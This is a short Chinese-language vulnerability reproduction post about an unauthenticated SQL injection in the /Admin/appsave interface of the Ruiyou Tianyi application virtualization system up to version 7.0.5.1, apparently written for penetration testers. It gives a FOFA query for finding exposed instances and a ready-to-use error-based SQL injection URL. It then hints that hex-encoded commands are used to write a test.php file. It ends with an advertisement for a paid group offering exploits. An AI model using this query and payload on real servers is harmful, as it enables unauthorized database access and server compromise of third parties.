网络测绘
fofa:title=="瑞友应用虚拟化系统"
漏洞描述
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。
瑞友天翼应用虚拟化系统中的/Home/Controller/AdminController 存在 appsave接口无需鉴权并且存在SQL注入。
影响版本
version<=7.0.5.1
漏洞复现
使用burp suite抓包构造POC
/index.php?s=/Admin/appsave&appid=3')+AND+(SELECT+2590+FROM(SELECT+COUNT(*),CONCAT(0x716a766a71,(SELECT+(ELT(2590=2590,1))),0x7162786271,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)--+ITBH
将命令进行hex编码执行
访问test.php
加入我们的星球,我们能提供:
1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。
